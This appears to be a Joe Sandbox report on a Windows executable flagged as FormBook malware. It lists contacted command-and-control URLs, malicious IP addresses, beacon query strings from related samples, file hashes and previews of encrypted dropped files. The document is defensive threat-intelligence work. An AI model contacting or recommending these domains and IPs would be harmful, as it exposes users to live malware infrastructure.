    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
http://www.uhug.xyz/jd21/www.maioral-store.com | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
http://www.p-afactorysale.shopReferer: | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re- | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp
http://schemas.micro | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000000.1713192297.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.4153445383.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.4149679384.0000000007F40000.00000002.00000001.00040000.00000000.sdmp
http://www.californiacurrentelectric.comReferer: | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
http://www.tyumk.xyzReferer: | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
http://www.fasci.online/jd21/ | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
http://www.fostertv.net | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp
http://www.p-afactorysale.shop | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp
http://www.batremake.com/jd21/www.crucka.xyz | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
https://api.msn.com/q | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000003.3113987697.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3479427968.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1713933761.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4150997601.00000000097D4000.00000004.00000001.00020000.00000000.sdmp
http://www.00050591.xyzReferer: | false | Avira URL Cloud: safe | unknown
    source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1 | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg | false | URL Reputation: safe | unknown
    source: explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark | false
    source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp
          • URL Reputation: safe
          unknown
          https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4147214666.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://www.batremake.comexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.tech-with-thulitha.siteexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://www.arthemis-168bet.siteReferer:explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.urbanholidayz.com/jd21/www.batremake.comexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.californiacurrentelectric.com/jd21/www.b2vvuc00.sbsexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.uhug.xyzexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://aka.ms/Vh5j3kexplorer.exe, 00000002.00000002.4148832143.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108048542.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://www.maioral-store.com/jd21/www.zaib.artexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000002.00000003.3479427968.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3113987697.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1713933761.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4150997601.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://www.californiacurrentelectric.com/jd21/explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
IP | Domain | Country | ASN | ASN Name | Malicious
66.235.200.145 | californiacurrentelectric.com | United States | 13335 | CLOUDFLARENETUS | true
65.21.196.90 | 00050591.xyz | United States | 199592 | CP-ASDE | true
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1489361
          Start date and time:2024-08-07 12:46:07 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 11m 28s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:9
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:1
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Sample name:8t1uarSZFV.exe
          renamed because original name is a hash value
          Original Sample Name:b5c54101374cc75a2e4b8960243fbccfe81c267d9e05af3b72e10b2fa812aff5.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@8/4@11/2
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 52
          • Number of non-executed functions: 286
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Override analysis time to 240000 for current running targets taking high CPU consumption
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtEnumerateKey calls found.
          • Report size getting too big, too many NtOpenKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
06:47:40 | API Interceptor | 10548888x Sleep call for process: explorer.exe modified
06:47:46 | API Interceptor | 9050144x Sleep call for process: netsh.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
66.235.200.145 | 6ddrUd6iQo.exe | malicious | FormBook | www.baseinvestments.site/1zzj/
66.235.200.145 | AWB NO. 077-57676135055.exe | malicious | FormBook | www.lakemontbellevue.com/bjbg/
66.235.200.145 | DHL Receipt_AWB#20240079104.exe | malicious | FormBook | www.lakemontbellevue.com/ld28/?3Xd=detQRJhNSOte/MMKAeFCHQdrYsI9TT+LmPx5A1J5xMe4V34+sX8EdyBejeqfNCZfKSqZdnV4VnFNmZ4/AzmN1DMS5R4a1wm07eTy015a8TIqAfj/mBukJiQ=&Cdl=szJ4
66.235.200.145 | INVOICE087667899.exe | malicious | Unknown | heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
66.235.200.145 | 2FcJgghyXg.exe | malicious | FormBook | www.soccercitycupsc.com/us94/?FV9l7b=S5srMiwBCDtV4rjo3jAT9rEjkkSDttoSOLAmgXzTQBVP9tcOlEr2qFRjTuqDw5Sxe1FF&BbW=QzuhmF0pKL
66.235.200.145 | ClbrTLBbVA.exe | malicious | FormBook | www.adornmentwithadrienne.com/ne28/?yXB=JRhSHg+E0kVeMb5bWxBNKjX7GZb/Gd7gTaCbDgRTO6UaOuEkMa6xiN+s4LYpa+moX3ut&DR-Hl=f48d7hbXPvmPj
66.235.200.145 | r5573XLX_Confirming_685738_Permiso.vbs | malicious | FormBook | www.shivanshnegi.com/hb6q/?kF=SLfnpSH8JFkD4JBvPgRq/MrmccQ0IKCWuyGgdNK0iEg51HeS6g2oNSkb61BOtzoBwxfmw1AFCol6MwSDOKA9DD+yD/DKRM1OfQ==&LPW33a=EJ_Y5C3RY2AMjvtQ
66.235.200.145 | BBVA-Confirming_Facturas_Pagadas_al_Vencimiento.vbs | malicious | FormBook | www.shivanshnegi.com/hb6q/?3t-_2h=lQe4u&_30_T=SLfnpSH8JFkD4JBvPgRq/MrmccQ0IKCWuyGgdNK0iEg51HeS6g2oNSkb61BOtzoBwxfmw1AFCol6MwSDOKA9DD+yD/DKRM1OfQ==
66.235.200.145 | GlobalImagingDocuments9575734549684.vbs | malicious | FormBook | www.shivanshnegi.com/g0c0/?J1ZahCdL=C0KZfCw3M9dgcVMegUaXT5mHrabIsWwgKIwZghABK/zPnQmv2J3/nbZH+UKlayZCqk+j1NVXNAMuRNCfj24K4Q5P5C8DM0dqWdfKhTZFySIl&uEk=kKVhb1ODb
66.235.200.145 | 0ySMPNiDoA.exe | malicious | FormBook | www.theunstoppabletravelers.com/a19i/?4hkT=rLtsLZhSdQwFRkvaG8FjiaGEB8J9o/aSV6LeKN0wyHa1R2N5aTBKUDHw+apOLNME5B3p&aHzLRr=9rl0dna
65.21.196.90 | COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe | malicious | FormBook | www.00050591.xyz/jd21/?tBZLfTtx=+5nsDbzeImt5UbX4GDv04YNxDKhKydlr4q6vzHl7qi3uGOgXSU0vDET8vanb4niZtoheVA==&oHEpRr=M2JpdRJ
65.21.196.90 | 42ZjBoAnX1.rtf | malicious | FormBook | www.00050680.xyz/sk49/?aBWDfH=DP6tx2QHp&K4lp=5GTzvGjP6k9MjAkPrzxwWthptOK8N3QKes/6FYN5/ElPyt3wyqkU/OkBaVA77XqorlFk5g==
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.batremake.com | COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe | malicious | FormBook | 213.186.33.5
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CP-ASDE | DHL SHIPPING DOCUMENT.exe | malicious | FormBook | 65.21.25.53
CP-ASDE | woklsbEMwW.exe | malicious | Vidar | 65.21.246.249
CP-ASDE | https://arescz.ucetnictvi.uol.cz | malicious | Unknown | 65.21.83.90
CP-ASDE | SecuriteInfo.com.Trojan.Inject4.49019.7456.123.exe | malicious | Unknown | 65.21.213.208
CP-ASDE | SecuriteInfo.com.Trojan.Inject4.49019.7456.123.exe | malicious | Unknown | 65.21.213.208
CP-ASDE | COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe | malicious | FormBook | 65.21.196.90
CP-ASDE | http://elca.com.co/risebyliftingothers/fxc/bWN2QGNvcmVkYy5jb20= | malicious | HTMLPhisher | 65.21.29.43
CP-ASDE | eqqjbbjMlt.elf | malicious | Unknown | 65.21.127.168
CP-ASDE | http://reedempayml.ogr.my.id/ | malicious | HTMLPhisher | 65.21.235.194
CP-ASDE | Autodesk AutoCAD 2023.exe | malicious | Vidar | 65.21.246.249
CLOUDFLARENETUS | Owo_Trick_Private.exe | malicious | Discord Token Stealer, Hog Grabber, ItroublveBOT Stealer | 162.159.135.232
CLOUDFLARENETUS | https://urlty.co/wroIT | malicious | Unknown | 104.21.90.242
CLOUDFLARENETUS | Investec Payment-Copy.pdf | malicious | HTMLPhisher | 162.159.61.3
CLOUDFLARENETUS | https://pdfelementcloud.wondershare.com/share/web?id=jFiYYQdoAI-6RmVGHw22jIeL9GaCw3femecA0QShb7bk8mwrF_UQJUUbKo_EQwKZmmQA1cOzTm1EOxcLJ15jTQ | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | https://dwrobotics.co.za/sjjsy | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | 709282738372873.exe | malicious | FormBook | 188.114.96.3
CLOUDFLARENETUS | DHL Package.exe | malicious | GuLoader, Snake Keylogger | 172.67.177.134
CLOUDFLARENETUS | https://24kjeans.com/5d9b8-7e8d4-0318b-e2566-1f7d4-f3581-c45d9-b8.php | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | INVOICE.exe | malicious | GuLoader | 104.26.12.205
CLOUDFLARENETUS | NGL1Of0ZkJ.hta | malicious | Cobalt Strike, AgentTesla | 172.67.74.152
          No context
          No context
          Process:C:\Users\user\Desktop\8t1uarSZFV.exe
          File Type:data
          Category:dropped
          Size (bytes):179814
          Entropy (8bit):7.98380918030497
          Encrypted:false
          SSDEEP:3072:y1kzP4JxBvIbp441aGGnR12hy8hlIxBZ2SXu3i0vCtQyYarqrQd0:bPgQm5qmxP/eUtQyZr0Qd0
          MD5:972EBA371B30366D90295542F4482A98
          SHA1:B6EC5FE819E940EA9C2ACFB958E8333CEAD6FF1F
          SHA-256:623488FD9561B4D53795A09CE298EC00EFC238956EA4AADF6E640D8D231F504E
          SHA-512:E0CB6546F16C7BC4A945FE88A8C65F48A6EA971FFEA4E29859F30B123701CD69A259FBE7B65848EF1424FF12308C8651179EAFB3305DCCAB7AD2D3447260E18E
          Malicious:false
          Reputation:low
          Preview:EA06.....Gc.=-N.9.DwzZ/c....{........{.....4.g..eN.Z..... ..L..*?...1..]0..<.g"...j.. .L$.I..Oo...4.....\a1..f.&.J,U.UB....6....%~.......%^..k9..t.....k.......Oi..u+.H..I2.t&.`......T.u..7....@.....g..D.L..@-.-.T.....i........4Sg3*d..iR*t...h...x..)....Q........i.....#......9......1~.....4b*t.|....{..?...o........................K...E...._....."......je3...v.p..s..D1.........\.....=...K]1......w...l.t..Cm..S2Zj.k.\..g...3[T.d;q....3...P.S...e.....+@.g.Q..KI).Df.l.s....6T{|..H.Q.d....q....3[[.o5.-e>m....y...wV.fx...#.E.B.:.2OI.~.0.es.*.q.X..`...\..k....mT..R..........R..-..M..6z.>.gS.{0tl.{...O..n.^...V......L.Ux.0..6.Ng\l.KYB..j.O..E(..*....A@....e........g..Nr.....D..']..owU...^<GJ...{./c=..Pl.X.W....ct....A....{f.......;AC.f....&{...8...2..U......E..p.7....].;.......U@...}...3..9.....o...X(}..6...q.:.d?[|....J/:...r....cO|.m....M..im;.76...l...KmC...-..#...^./...l.<x5_....1...Ri..U.=..#';.lqS.$'_.../.N%..x..x...6..R..Z...\.B.]..n1...w
          Process:C:\Users\user\Desktop\8t1uarSZFV.exe
          File Type:data
          Category:dropped
          Size (bytes):9720
          Entropy (8bit):7.629129793048073
          Encrypted:false
          SSDEEP:192:ZxCiuJsp1HXOIGVpsaKy8t21MeHQnq/eTWwoPbEpelKRqpx22lM73a:ZxCiIsp5XOmy6nWw44RqpM2lY3a
          MD5:A12776D536E47CCB49C89100C8632636
          SHA1:206391E067375BEF958AC94B4E159731829D5C9B
          SHA-256:8EAA6E3B92C6F8F4DFBFFA3AE9D7318F69A7E0ABBC7FF6816A86BC1DFAD818A5
          SHA-512:07513AA0164FCF2456BA863A9B7EBF21B1694EC77CB9286BB7CC507A4C88C9F976BA5FF28246C9A56857F9BE1366EEA12F2514278BCC0383A3A8895B714F78B0
          Malicious:false
          Reputation:low
          Preview:EA06..p........f..-.k5.g5.......ue..l....g9...y..oe.Ng..]....I...K........|.@.o..e.Nl......;.M...<..g.`........5.Z..q<..6.p.o.r..Y......g.<.M..`..Y....N...y.........<.M. ...r.'s....c ....Ad.H.....0.F.3<..Z..6...<.f....&....x..p....Bx.....Y'@0.N,.;,.t...Y.5_..n..... 5_..v.U...5_....U....5_..f.U..&.5\..>3@..N@^.d.Z..q9.z..u9......@.........G.@/Z..g......jx....t.u....$.../.u;...g@G_T.......>_.......zq8..........P..................`.M..`... ...f...@..@.'.7..@{>K,..c..,.p..Yg ._..v....A.>K(#G.e..3|vi..G.7...8_..qf..i|vi....f.h.,.@......5..:..-3{M....6`;..;..'.`.L..6...f..+0.ff.Y...9.......f.`.E...Y....3.y............vy.....`.....2p....<d....,vh...$......!+0.'&.....,fu5.Y..Y......r.5.X...c3.<.ki.Y.!...Gf.....,f.<.N. . .#:.....c.`........v.h.s.....,vl...,..t......40.....f.........4..@.6.-..p..S.E..5...S`.N...;8.`..<.......q;.....c....Z&..wx.....vr........E......y6....p.c3.=..7..b.!....F ...B5f...........vt......fvk=.x...B3......;;.X...d....8........g`...Mg..D..f...
          Process:C:\Users\user\Desktop\8t1uarSZFV.exe
          File Type:data
          Category:dropped
          Size (bytes):189440
          Entropy (8bit):7.824369272707001
          Encrypted:false
          SSDEEP:3072:6Db7veE2apWPscQrKTgcUYbZb+YHbNUoGTNhn5ngVc4+CSVcAr1SnMDfq7kVS5C1:IPsapWwrKccdbZbFNhG5nVFVcArNDi70
          MD5:BCCBCB8A5E5B6FB462F3D91B49E85F07
          SHA1:0F707A1B3ED92789D88901349C4502E432AD94F0
          SHA-256:E472C56D121791D2F5D7C705F4678E34BBEBCAAC42AE6E6AF8C43AA1D6E43FDD
          SHA-512:62A6561082C20BE4881D2580C940052E815449843C1D8113A7A769FB5FC1FCCDA12B7F5B7CE3995451EB7318DE27C4A05E9F7BD874BAC6A98F1596F47DEFADA9
          Malicious:false
          Reputation:low
          Preview:.....SO92...E..q.O:...eO[...MSO92I8MLSGZQMSO92I8MLSGZQMSO9.I8MBL.TQ.Z...Ht.m./3"m#=VU;Y l0&4?"'o[WiJ8"s.4q...._&\(b^JPuMSO92I8.[...+.T...*.Z...._..8....<.S....^..:$2..5.92I8MLSGZQMSO92Ih.LS.[PM....I8MLSGZQ.SM89H2ML.EZQMSO92I8-.RGZAMSO.0I8M.SGJQMSM92L8LLSGZQHSN92I8ML.EZQOSO92I8OL..ZQ]SO)2I8M\SGJQMSO92Y8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8c86?.QMS..0I8]LSG.SMS_92I8MLSGZQMSO9.I8-LSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8M
          Process:C:\Users\user\Desktop\8t1uarSZFV.exe
          File Type:ASCII text, with very long lines (28674), with no line terminators
          Category:dropped
          Size (bytes):28674
          Entropy (8bit):3.5754864862650506
          Encrypted:false
          SSDEEP:768:JxU+eScFCo3T3iC9vp3IntIU++nN+nOkW/est2Hz0mL5sCWi:s+eScFCo3T3i8vp3IntIU++nN+nOkW/o
          MD5:5C551CB1B10EACD57846BB95F762DC85
          SHA1:F4C0094B718CBFE63BDB34657CDDF079249B8354
          SHA-256:3823D4D2E701714D58F527DE17722F3F6F73FFEBEE98868EDE90F7004BB21094
          SHA-512:F1F4A1F9A6311D032C1758CE035966F6EA2736AA87C75A504F5C439ED1FAA0B4E3B588C1BCE508EADE40D1079D58E46E62632F7B4B16B7CF2D34AD261950DC06
          Malicious:false
          Reputation:low
          Preview:3{88;ehf;4hfff353333898:e;9e33333399;<78;7e<9833333399;<7g;9ed:533333399;<88;;e;9h33333399;<78;de<9833333399;<7g;fed9f33333399;<88;he;6633333399;<78<3e<6533333399;<7g<5ed5h33333399;<88<7e;9733333399;<78<9e<9f33333399;<7g<;ed9f33333399;<88<d66f399;<78<fe<9h33333399;<;g77iiiiiied:733333399;<<879iiiiiie;9733333399;<;87;iiiiiie<9f33333399;<;g7diiiiiied9f33333399;<<87fiiiiiie;5h33333399;<;87hiiiiiie<9733333399;<;g83iiiiiied9f33333399;<<885iiiiiie;9f33333399;<;887iiiiii66f<99;<;g89iiiiiied:833333399;<88g3e;:633333399;<78g5e<9833333399;<7gg7ed:533333399;<88g9e;6633333399;<78g;e<6533333399;<7ggded5h33333399;<88gfe;9733333399;<78ghe<9f33333399;<7gh3ed9f33333399;<88h566f399;<78h7e<9433333399;<;g9;iiiiiied9733333399;<<89diiiiiie;:933333399;<;89fiiiiiie<9433333399;<;g9hiiiiiied:333333399;<<8:3iiiiiie;9<33333399;<;8:5iiiiiie<6633333399;<;g:7iiiiiied6533333399;<<8:9iiiiiie;5h33333399;<;8:;iiiiiie<9733333399;<;g:diiiiiied9f33333399;<<8:fiiiiiie;9f33333399;<;8:hiiiiii66f<99;<7g;3ed:633333399;<88d3e;9;
          File type:PE32 executable (GUI) Intel 80386, for MS Windows
          Entropy (8bit):6.968898104484643
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.96%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:8t1uarSZFV.exe
          File size:1'118'208 bytes
          MD5:14876f2aecbf08493108d81f260bfe7a
          SHA1:ef0dfe01cecc9972141738f251a235059082b106
          SHA256:b5c54101374cc75a2e4b8960243fbccfe81c267d9e05af3b72e10b2fa812aff5
          SHA512:aff1f1d1dbc16059a895919a595902db67a59ea3eba46263defed3111a7fb0d3c241237c04a265c8045a6d52e313db6fdbc71ec01626bd30350210818820e774
          SSDEEP:24576:xqDEvCTbMWu7rQYlBQcBiT6rprG8af5sFc/sq97F:xTvC/MTQYxsWR7afSckQ7
          TLSH:4435BF0273C1C062FFAB96334B5AF6515BBC69260123E62F13A81D79BD701B1563E7A3
